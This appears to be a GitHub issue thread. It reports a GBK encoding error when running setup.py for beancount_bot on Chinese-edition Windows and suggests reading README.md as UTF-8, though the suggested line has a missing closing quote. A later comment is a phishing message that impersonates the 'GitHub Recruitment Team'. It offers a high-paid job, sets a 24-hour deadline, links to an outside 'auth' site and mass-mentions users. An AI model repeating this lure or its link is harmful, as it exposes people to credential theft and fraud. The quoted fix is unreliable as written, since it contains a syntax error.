### ISSUE TITLE
不可移植问题以及解决方案

### ISSUE THREAD

**Issue by MTDickens** [kaaass/beancount_bot#2]
## 问题描述

在 Windows 11 国行版执行 `python3 setup.py` 命令时，出现错误：
```
Traceback (most recent call last):
  File "C:\xxx\setup.py", line 8, in <module>
    long_description = (root / "README.md").read_text()
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.3056.0_x64__qbz5n2kfra8p0\lib\pathlib.py", line 1135, in read_text    
    return f.read()
UnicodeDecodeError: 'gbk' codec can't decode byte 0x8e in position 27: illegal multibyte sequence
```

## 解决方案

将代码第八行改为 `long_description = (root / "README.md").read_text('utf-8)` 即可。

**Comment by kaaass** [comment]
感谢报告！

**Comment by JK-0** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
jhsware, @ferc, @gustavbang, @apertureless, @void-main, @wuhaow, @azju, @destroymayor, @MarioJuniorPro, @yunjiali, @Ghost-Zhou, @LazerJesus, @lodembeep, @heboliufengjie, @dotarjun, @GenDreamWorld, @liuderchi, @lishenghua1234, @nakaakist, @yusufdemir
